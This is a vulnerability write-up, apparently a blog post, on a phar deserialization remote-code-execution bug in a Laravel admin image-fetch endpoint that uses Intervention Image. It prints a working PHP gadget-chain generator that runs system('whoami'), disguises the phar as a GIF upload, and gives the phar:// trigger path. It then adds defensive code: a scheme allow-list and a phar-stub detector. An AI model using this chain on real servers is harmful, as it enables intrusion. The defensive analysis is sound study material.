Table of contents
Preface
Exploitation
Analysis

Preface
I had meant to reproduce this earlier but forgot about it; catching up on it tonight.

Exploitation
First, generate a phar with phpggc, or, if you can't be bothered, use this one:
<?php
// Minimal stand-ins for the Laravel classes that make up the gadget chain
namespace Illuminate\Broadcasting {
    class PendingBroadcast
    {
        protected $events;
        protected $event;

        public function __construct($events, $event)
        {
            $this->events = $events;
            $this->event = $event;
        }
    }

    class BroadcastEvent
    {
        protected $connection;

        public function __construct($connection)
        {
            $this->connection = $connection;
        }
    }
}

namespace Illuminate\Bus {
    class Dispatcher
    {
        protected $queueResolver;

        public function __construct($queueResolver)
        {
            $this->queueResolver = $queueResolver;
        }
    }
}

namespace {
    $command = new Illuminate\Broadcasting\BroadcastEvent('whoami');
    $dispatcher = new Illuminate\Bus\Dispatcher("system");
    $PendingBroadcast = new Illuminate\Broadcasting\PendingBroadcast($dispatcher, $command);

    // Build the archive; the GIF header in the stub lets it pass image checks
    $phar = new Phar('phar.phar');
    $phar->startBuffering();
    $phar->setStub("GIF89a" . "<?php __HALT_COMPILER(); ?>");
    $phar->addFromString('test.txt', 'test');
    $phar->setMetadata($PendingBroadcast);
    $phar->stopBuffering();
    rename('phar.phar', 'phar.jpg');
}
Then upload it through the admin back end and note the relative path it is stored under.
Next, on your VPS, write:
phar://./upload/image/06/uzOpshR76Znv0gG6mvL9YHBRXPI5EaEDFpwqfgCp.gif
Finally send the request; the command executes successfully.
Analysis
The vulnerable spot is the same one as the previously disclosed arbitrary file read and RCE: the fetchImageFile function in Http/Controllers/Admin/NEditorController.php. Because what I pass in is not a WebP file, execution reaches Image::make($data); and this $data variable is the body returned by the request.
Follow it all the way down to the init method in src/Intervention/Image/AbstractDecoder.php:
public function init($data)
{
    $this->data = $data;

    switch (true) {

        case $this->isGdResource():
            return $this->initFromGdResource($this->data);

        case $this->isImagick():
            return $this->initFromImagick($this->data);

        case $this->isInterventionImage():
            return $this->initFromInterventionImage($this->data);

        case $this->isSplFileInfo():
            return $this->initFromPath($this->data->getRealPath());

        case $this->isBinary():
            return $this->initFromBinary($this->data);

        case $this->isUrl():
            return $this->initFromUrl($this->data);

        case $this->isStream():
            return $this->initFromStream($this->data);

        case $this->isDataUrl():
            return $this->initFromBinary($this->decodeDataUrl($this->data));

        case $this->isFilePath():
            return $this->initFromPath($this->data);

        // isBase64 has to be after isFilePath to prevent false positives
        case $this->isBase64():
            return $this->initFromBinary(base64_decode($this->data));

        default:
            throw new NotReadableException("Image source not readable");
    }
}
Keep tracing from the isUrl branch: a phar:// source passes through without any obstacle and triggers deserialization.
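What this boils down to for a defender: the decoder's isUrl branch accepts any string that looks like a URL, so the scheme has to be constrained before the untrusted value ever reaches Image::make. The snippet below is an added example of that gate, written for this post; it is not code from the original post, from Intervention Image, or from the affected application. It assumes the controller has the raw source string as $src and that uploaded file bytes are available as $bytes; the function names and the sample inputs are constructed for illustration.

```php
<?php
// Added defensive example (not from the original post or the affected project).
// Assumed: an untrusted $src string is about to be handed to Image::make(),
// and uploaded file contents are available as a string before they are stored.

/**
 * Accept only plain http/https URLs for remote fetches.
 * This rejects every PHP stream wrapper (phar://, file://, data:, compress.*,
 * glob://, ...) before the image decoder gets to choose a branch.
 */
function isSafeRemoteImageSource(string $src): bool
{
    $parts = parse_url($src);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return false;
    }
    return in_array(strtolower($parts['scheme']), ['http', 'https'], true);
}

/**
 * Upload-time check: a phar archive must carry the __HALT_COMPILER stub,
 * no matter which extension or leading image magic bytes it was given.
 * Use it alongside a real image-format check, not instead of one.
 */
function looksLikePharArchive(string $bytes): bool
{
    return stripos($bytes, '__HALT_COMPILER') !== false;
}

/**
 * Wrapper for the controller: returns the source only when it is acceptable,
 * otherwise throws so the caller never reaches Image::make().
 */
function guardedImageSource(string $src): string
{
    if (!isSafeRemoteImageSource($src)) {
        throw new InvalidArgumentException('Only http/https image sources are allowed');
    }
    return $src;
}

// Constructed inputs for illustration (not taken from the post)
$cases = [
    'https://example.com/a.png'                 => true,
    'phar://./upload/image/06/constructed.gif'  => false,
    '/etc/passwd'                               => false,
    'data:image/gif;base64,R0lGODlh'            => false,
];
foreach ($cases as $src => $expected) {
    if (isSafeRemoteImageSource($src) !== $expected) {
        throw new RuntimeException("unexpected verdict for $src");
    }
}

// A disguised phar: GIF header followed by the phar stub, as in the post
if (!looksLikePharArchive("GIF89a<?php __HALT_COMPILER(); ?>")) {
    throw new RuntimeException('phar stub not detected');
}
// A genuine (truncated) GIF header must not trip the check
if (looksLikePharArchive("GIF89a\x01\x00\x01\x00")) {
    throw new RuntimeException('false positive on plain image bytes');
}

echo "all checks passed\n";
```

The scheme allow list is the important half: it is applied to the string itself, before any file or stream function touches it, so the phar wrapper is never invoked. If the application has no legitimate use for phar archives at runtime, calling stream_wrapper_unregister('phar') during bootstrap is a further, application-wide cut-off that does not depend on every call site remembering to validate.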